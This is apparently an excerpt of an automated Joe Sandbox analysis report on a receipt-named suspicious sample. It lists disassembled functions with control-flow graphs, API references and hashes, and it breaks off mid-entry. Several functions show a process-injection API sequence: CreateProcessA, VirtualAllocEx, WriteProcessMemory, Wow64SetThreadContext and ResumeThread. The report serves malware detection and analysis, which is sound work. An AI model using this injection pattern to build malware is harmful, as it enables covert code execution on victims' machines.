                                                                  control_flow_graph 1463 7575519-757556b 1465 757556d-7575579 1463->1465 1466 757557b-75755ab Wow64SetThreadContext 1463->1466 1465->1466 1468 75755b4-75755e4 1466->1468 1469 75755ad-75755b3 1466->1469 1469->1468
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757559E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID: U
                                                                  • API String ID: 983334009-3372436214
                                                                  • Opcode ID: 627c3df7f59a0f25b9be4064c44c285e0d26a08835bcaa753e4d966e81092f5a
                                                                  • Instruction ID: 7161f674a077a87c48e32150a8c55603aff771336497818464585ed24aeafa85
                                                                  • Opcode Fuzzy Hash: 627c3df7f59a0f25b9be4064c44c285e0d26a08835bcaa753e4d966e81092f5a
                                                                  • Instruction Fuzzy Hash: 1B2157B19007098FDB10DFAAC4857EEBBF5EF88324F54842AD419A7241DB789944CFA0
                                                                  Function 072E2AD8 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1473 72e2ad8-72e2ae7 1474 72e2aef-72e2af1 1473->1474 1475 72e2b0b-72e2b78 call 72e20d8 1474->1475 1476 72e2af3-72e2b08 1474->1476 1485 72e2b7e-72e2b80 1475->1485 1486 72e2c24-72e2c3b 1475->1486 1487 72e2b86-72e2b91 call 72e22f0 1485->1487 1488 72e2cb0-72e2d57 1485->1488 1501 72e2c3d-72e2c3f 1486->1501 1502 72e2c41 1486->1502 1493 72e2bae-72e2bb2 1487->1493 1494 72e2b93-72e2b95 1487->1494 1523 72e2d59-72e2d5f 1488->1523 1524 72e2d60-72e2d81 1488->1524 1498 72e2bb4-72e2bc8 call 72e2418 1493->1498 1499 72e2c11-72e2c1a 1493->1499 1496 72e2b97-72e2b9e 1494->1496 1497 72e2ba0-72e2bab call 72e16cc 1494->1497 1496->1493 1497->1493 1511 72e2bde-72e2be2 1498->1511 1512 72e2bca-72e2bdb call 72e16cc 1498->1512 1503 72e2c46-72e2c48 1501->1503 1502->1503 1506 72e2c7d-72e2ca9 1503->1506 1507 72e2c4a-72e2c76 1503->1507 1506->1488 1507->1506 1513 72e2bea-72e2c03 1511->1513 1514 72e2be4 1511->1514 1512->1511 1525 72e2c0e 1513->1525 1526 72e2c05 1513->1526 1514->1513 1523->1524 1525->1499 1526->1525
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq$Hhq
                                                                  • API String ID: 0-2633903351
                                                                  • Opcode ID: 66f9276b9c22ff9e5f52c6f613198fb9a6eb6519e9a7645a027a8c7992827214
                                                                  • Instruction ID: e1092146db9b2a64727d02206a0fb0e1069a93be59c55b8eb11316d2cf0034ea
                                                                  • Opcode Fuzzy Hash: 66f9276b9c22ff9e5f52c6f613198fb9a6eb6519e9a7645a027a8c7992827214
                                                                  • Instruction Fuzzy Hash: 4171BDB0A106198FDB14EF79D9147AEBBFAFF88310F54842DD506A7280DB389D41CBA5
                                                                  Function 072E82D0 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1633 72e82d0-72e82dc 1634 72e82de-72e8335 call 72e839f 1633->1634 1635 72e8333 1633->1635 1637 72e833b-72e833d 1634->1637 1635->1634 1641 72e82fc-72e830b 1637->1641 1642 72e82e6-72e82ec 1637->1642 1645 72e833f-72e8357 1641->1645 1646 72e830d-72e831a 1641->1646 1643 72e82ee 1642->1643 1644 72e82f0-72e82f2 1642->1644 1643->1641 1644->1641 1646->1645 1647 72e831c-72e8332 1646->1647
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1690725830.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_72e0000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: fe3654dcd1f0a90486f5b5e15f43559c36c31f4f6db9ee2776783eed55b724ac
                                                                  • Instruction ID: c71fe5b00ca276dfd3f9f9d23fecbe6894594edd377f1183c27c820a6a8791e1
                                                                  • Opcode Fuzzy Hash: fe3654dcd1f0a90486f5b5e15f43559c36c31f4f6db9ee2776783eed55b724ac
                                                                  • Instruction Fuzzy Hash: 5C0128B053A282CFC315D725D810261BBB9BB07304F94A2EBD499CB152C7B18882C3AA
                                                                  Function 07575D6C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1977 7575d6c-7575e0d 1980 7575e46-7575e66 1977->1980 1981 7575e0f-7575e19 1977->1981 1986 7575e9f-7575ece 1980->1986 1987 7575e68-7575e72 1980->1987 1981->1980 1982 7575e1b-7575e1d 1981->1982 1983 7575e40-7575e43 1982->1983 1984 7575e1f-7575e29 1982->1984 1983->1980 1988 7575e2d-7575e3c 1984->1988 1989 7575e2b 1984->1989 1997 7575f07-7575fc1 CreateProcessA 1986->1997 1998 7575ed0-7575eda 1986->1998 1987->1986 1990 7575e74-7575e76 1987->1990 1988->1988 1991 7575e3e 1988->1991 1989->1988 1992 7575e99-7575e9c 1990->1992 1993 7575e78-7575e82 1990->1993 1991->1983 1992->1986 1995 7575e86-7575e95 1993->1995 1996 7575e84 1993->1996 1995->1995 1999 7575e97 1995->1999 1996->1995 2009 7575fc3-7575fc9 1997->2009 2010 7575fca-7576050 1997->2010 1998->1997 2000 7575edc-7575ede 1998->2000 1999->1992 2002 7575f01-7575f04 2000->2002 2003 7575ee0-7575eea 2000->2003 2002->1997 2004 7575eee-7575efd 2003->2004 2005 7575eec 2003->2005 2004->2004 2007 7575eff 2004->2007 2005->2004 2007->2002 2009->2010 2020 7576052-7576056 2010->2020 2021 7576060-7576064 2010->2021 2020->2021 2022 7576058 2020->2022 2023 7576066-757606a 2021->2023 2024 7576074-7576078 2021->2024 2022->2021 2023->2024 2025 757606c 2023->2025 2026 757607a-757607e 2024->2026 2027 7576088-757608c 2024->2027 2025->2024 2026->2027 2028 7576080 2026->2028 2029 757609e-75760a5 2027->2029 2030 757608e-7576094 2027->2030 2028->2027 2031 75760a7-75760b6 2029->2031 2032 75760bc 2029->2032 2030->2029 2031->2032 2034 75760bd 2032->2034 2034->2034
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07575FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: ee9828720dc22fe621be51b905001f6aad55cf8634fa8895ee63ffb236256c78
                                                                  • Instruction ID: ed2d6affb344e1f9fb767eec1b9981b18a349954589b45170dfd07a07c74395c
                                                                  • Opcode Fuzzy Hash: ee9828720dc22fe621be51b905001f6aad55cf8634fa8895ee63ffb236256c78
                                                                  • Instruction Fuzzy Hash: 34A17DB1D0065ADFDB14CF68D841BEDBBB2FF48310F1481AAE819A7240DB749995CF91
                                                                  Function 07575D78 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07575FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 9d4d72e143a97df686e5ad2d8be3c365f0937be84ac85a430a3aad09118d8636
                                                                  • Instruction ID: fe11ddb952de39fe187c48ed20e02e0db9b6c0674b41c0957403d90466a698d3
                                                                  • Opcode Fuzzy Hash: 9d4d72e143a97df686e5ad2d8be3c365f0937be84ac85a430a3aad09118d8636
                                                                  • Instruction Fuzzy Hash: F6916DB1D0065ACFDB14CF68D941BEDBBB2FF48310F1481AAD819A7280DB749995CF91
                                                                  Function 00A2B300 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00A2B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: b5ef4f9603d1ab46d71a6c03c2aaea3d15bfc216b3ac3c48dcb79855f84f7854
                                                                  • Instruction ID: 268be2fe270d21545803d7ec46d4de4daecfa3a942e388e693486efa60c99790
                                                                  • Opcode Fuzzy Hash: b5ef4f9603d1ab46d71a6c03c2aaea3d15bfc216b3ac3c48dcb79855f84f7854
                                                                  • Instruction Fuzzy Hash: 0F8168B0A10B558FD724DF29E18179ABBF1FF88310F00892DD48ACBA51D774E845CBA1
                                                                  Function 00A2590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 00A259C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: db75e7343e9069af82f3d59eb68d95de999f278bf5415e886ba4864d5602dc52
                                                                  • Instruction ID: b8bbdda3629a113f2220743da7d33ce488901a85c8301c289dba996dd470c761
                                                                  • Opcode Fuzzy Hash: db75e7343e9069af82f3d59eb68d95de999f278bf5415e886ba4864d5602dc52
                                                                  • Instruction Fuzzy Hash: 2941F2B0C00719CBDB24DFAAC885BDDBBF1BF49314F20816AD409AB251DB75A986CF50
                                                                  Function 00A25A84 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07f304a538e24f2c54501c4fe38971512939961558116a36ea33e5b02c3588dd
                                                                  • Instruction ID: 9302772fdf0963c32f8d4b0427617145fd98df92199895e613db0cc24bd0bd9f
                                                                  • Opcode Fuzzy Hash: 07f304a538e24f2c54501c4fe38971512939961558116a36ea33e5b02c3588dd
                                                                  • Instruction Fuzzy Hash: 6631CCB1C04B19CFCB11CBBCD8896ADBBF0FF55324F10826AC406AB251C775A986CB51
                                                                  Function 00A244B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 00A259C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 10a52aab34efc2523ad5b3685c9015866dc57b9f7afa94ca59c45662d0599bf4
                                                                  • Instruction ID: d9b16ca1ace5283e9054fd798555b00b381fda6faece3122946085d76c0e6fbe
                                                                  • Opcode Fuzzy Hash: 10a52aab34efc2523ad5b3685c9015866dc57b9f7afa94ca59c45662d0599bf4
                                                                  • Instruction Fuzzy Hash: E241E4B0C0071DCBDB24DFAAC885B9DBBF5BF48314F60816AD409AB251DB75A945CF90
                                                                  Function 07575AE8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07575B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 608c93edc45d220553e66c129214b3badd8d2eeb8ba6edfa48f4b2f2aafea412
                                                                  • Instruction ID: b6f5cc97e388f58bf1f028c9b8c4c8df22d596e60c48b6b8e6676f2a45618fa9
                                                                  • Opcode Fuzzy Hash: 608c93edc45d220553e66c129214b3badd8d2eeb8ba6edfa48f4b2f2aafea412
                                                                  • Instruction Fuzzy Hash: 6A215AB19003499FDB10DFAAD885BEEBBF5FF48320F10842AE919A7240D7749954CBA5
                                                                  Function 07575AF0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07575B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: f911dde330ea03fee79c7bf75489e0cd90950226e2cef1b1aee7d4a691a9c716
                                                                  • Instruction ID: 859487d143919feeaa7c6cc8150adfa16561d2224b4f720ad34af331ca0de13e
                                                                  • Opcode Fuzzy Hash: f911dde330ea03fee79c7bf75489e0cd90950226e2cef1b1aee7d4a691a9c716
                                                                  • Instruction Fuzzy Hash: 592139B19003499FCF10DFA9C885BEEBBF5FF48310F10842AE919A7240D7789954CBA4
                                                                  Function 0572EFC8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0572F05F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  • Opcode ID: 001218503bd74755410e53448c981db5acf9a4f37076b72cb0d2755f072e706c
                                                                  • Instruction ID: b420d402b6634974ea63b743a96fe07172eebb756880984cff2eae09e6ccd70f
                                                                  • Opcode Fuzzy Hash: 001218503bd74755410e53448c981db5acf9a4f37076b72cb0d2755f072e706c
                                                                  • Instruction Fuzzy Hash: 1021CEB5D003499FDB10CF9AD885AAEFBF5FF48320F14842AE919A7210D775A944CFA1
                                                                  Function 07575BD9 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07575C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 554399a9e60da28d1df75732f2a60c37f287a1ed37c853a858e90b219436c18e
                                                                  • Instruction ID: f2e958ac4a139fec07d2dccc06c3a3fc285df95e585b79c2a7d343235625570c
                                                                  • Opcode Fuzzy Hash: 554399a9e60da28d1df75732f2a60c37f287a1ed37c853a858e90b219436c18e
                                                                  • Instruction Fuzzy Hash: 9C214AB18007499FCB10DFAAD845BEEFBF5FF48320F50842AE559A7240C7359944DBA5
                                                                  Function 0572EFC2 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0572F05F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1678444630.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5720000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  • Opcode ID: 53dde8006f6badcd7f9e777486ebae962e9e533acb4504f6344149cc56bd0ded
                                                                  • Instruction ID: f79af0d8cb195ce32f7bb8d3bc4aaee0c724c5fb8000c324432892e83bd86623
                                                                  • Opcode Fuzzy Hash: 53dde8006f6badcd7f9e777486ebae962e9e533acb4504f6344149cc56bd0ded
                                                                  • Instruction Fuzzy Hash: 5C21EEB5D003099FDB10CF99D985AAEFBF5FF48320F24842AE919A7210D774A944CFA0
                                                                  Function 00A2D7C0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A2D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 930dfba84b6dc9f020278b24b8b65c42d9410546dea55756c07c21d3fbff2da7
                                                                  • Instruction ID: 46715b1906e7a6a1dda49489acf727fe56aca225ee647feeaeba5410ddccac68
                                                                  • Opcode Fuzzy Hash: 930dfba84b6dc9f020278b24b8b65c42d9410546dea55756c07c21d3fbff2da7
                                                                  • Instruction Fuzzy Hash: 472105B59002499FDB10CF99D484ADEBFF4FF48320F14806AE958A3211C3789951CFA0
                                                                  Function 07575BE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07575C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: eb4594eaa7f3fa02a3a7b78e74d71de44596e339044f7a476a1f5048aaa2d87c
                                                                  • Instruction ID: 1b021185f729573e0cbc9c3223f77be1d3d519482b95e2c9df9a829f85c57107
                                                                  • Opcode Fuzzy Hash: eb4594eaa7f3fa02a3a7b78e74d71de44596e339044f7a476a1f5048aaa2d87c
                                                                  • Instruction Fuzzy Hash: A62125B18003499FCB10DFAAC885BEEFBF5FF48320F50842AE519A7240D7389954DBA5
                                                                  Function 07575520 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0757559E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 97bf8744eb51b5e8e027865794a8b603cdf2494bd5ea00a8de6382e4828b7545
                                                                  • Instruction ID: 8d6391860aa89ef6b65ee09c73ecbebf8d5de221b683e1967b0fb641611190ba
                                                                  • Opcode Fuzzy Hash: 97bf8744eb51b5e8e027865794a8b603cdf2494bd5ea00a8de6382e4828b7545
                                                                  • Instruction Fuzzy Hash: 742138B1D003098FDB10DFAAC4857EEBBF5EF88324F54842AD419A7240DB789945CFA4
                                                                  Function 00A2D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A2D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1669648402.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_a20000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: a6b285dd054b4a0177998f189db88401d7bffb2a320f9fa4f768e5fbd9fd93ce
                                                                  • Instruction ID: 5650b103f55e3ab7cda728cf28e3dcb032716c822ddcf1092e17654e6a6c9752
                                                                  • Opcode Fuzzy Hash: a6b285dd054b4a0177998f189db88401d7bffb2a320f9fa4f768e5fbd9fd93ce
                                                                  • Instruction Fuzzy Hash: 7521E4B59003489FDB10CF9AD984ADEBBF8FB48320F14842AE918A3351D374A944CFA0
                                                                  Function 07575A28 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07575A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 979c909e606ad6c821617dadda78b95807e3c72f7b3cd99043b6c02298d8c157
                                                                  • Instruction ID: f823d45489f173742e1a36059f6bd531c6b835e37a16dc74cbe70ff57a16b0e0
                                                                  • Opcode Fuzzy Hash: 979c909e606ad6c821617dadda78b95807e3c72f7b3cd99043b6c02298d8c157
                                                                  • Instruction Fuzzy Hash: B1115CB19002499FCB10DFAAD845AEFFFF9FF88324F10841AE519A7250CB359950CBA1
                                                                  Function 07575A30 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07575A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 0812c73844a7c1e8de39979aa295ecf8aa3ca9e743396953217fb91a51e201fa
                                                                  • Instruction ID: db43b4178c382e1c5008af07fac95f9db7c79074db33cdcbfd6d45b31b595510
                                                                  • Opcode Fuzzy Hash: 0812c73844a7c1e8de39979aa295ecf8aa3ca9e743396953217fb91a51e201fa
                                                                  • Instruction Fuzzy Hash: BA1126B19002499FCB10DFAAC845ADEBBF5EF88320F248429E519A7250CB75A954CBA0
                                                                  Function 07575468 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 9c4a53c80fe5c5ebd2e06345e187d9d654cdba4c056c278180d67d7f821b4601
                                                                  • Instruction ID: 3f74504309b820bfc9d459f8007ee6edd313e958b8ef7cd32c519aec26d72877
                                                                  • Opcode Fuzzy Hash: 9c4a53c80fe5c5ebd2e06345e187d9d654cdba4c056c278180d67d7f821b4601
                                                                  • Instruction Fuzzy Hash: 191179B1D003488BCB20DFAAD4457DFFBF9EB88320F20841AD159A7240CB346544CBA4
                                                                  Function 075799CA Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07579A2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: 08c34f1a869164c0a23777f072d0b74d13b3057b48822c2241de77d4e6010f72
                                                                  • Instruction ID: 11090d696d963ba9a56ea5eb5b0c5fa3858242d6bcdc65cac0fc668d9152db87
                                                                  • Opcode Fuzzy Hash: 08c34f1a869164c0a23777f072d0b74d13b3057b48822c2241de77d4e6010f72
                                                                  • Instruction Fuzzy Hash: FC11E3B58003499FDB10DF99D945BDEFBF8FB48320F20851AE558A7200C775A544CFA1
                                                                  Function 07575470 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: c0cf73cf5f648b30ef1fd78830d3d5eddd4e77bdc29dd0ce73a6dad3e3ce3e45
                                                                  • Instruction ID: 3cdf9978c89166317db08f9a81492802be7fb3957dd574e8b48866236f59945c
                                                                  • Opcode Fuzzy Hash: c0cf73cf5f648b30ef1fd78830d3d5eddd4e77bdc29dd0ce73a6dad3e3ce3e45
                                                                  • Instruction Fuzzy Hash: A5113AB1D003498FDB20DFAAC4457DEFBF5EF88324F24845AD519A7240CB75A944CBA4
                                                                  Function 07574188 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07579A2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1691979162.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7570000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: 0179e7564770832d7b7a4f4670a4ba5ee57020c6808e1c58eb963a88254eadba
                                                                  • Instruction ID: dea11ef8217ba82b518954ab23e9f9ceec23d17f97993348bee43faf1ce34620
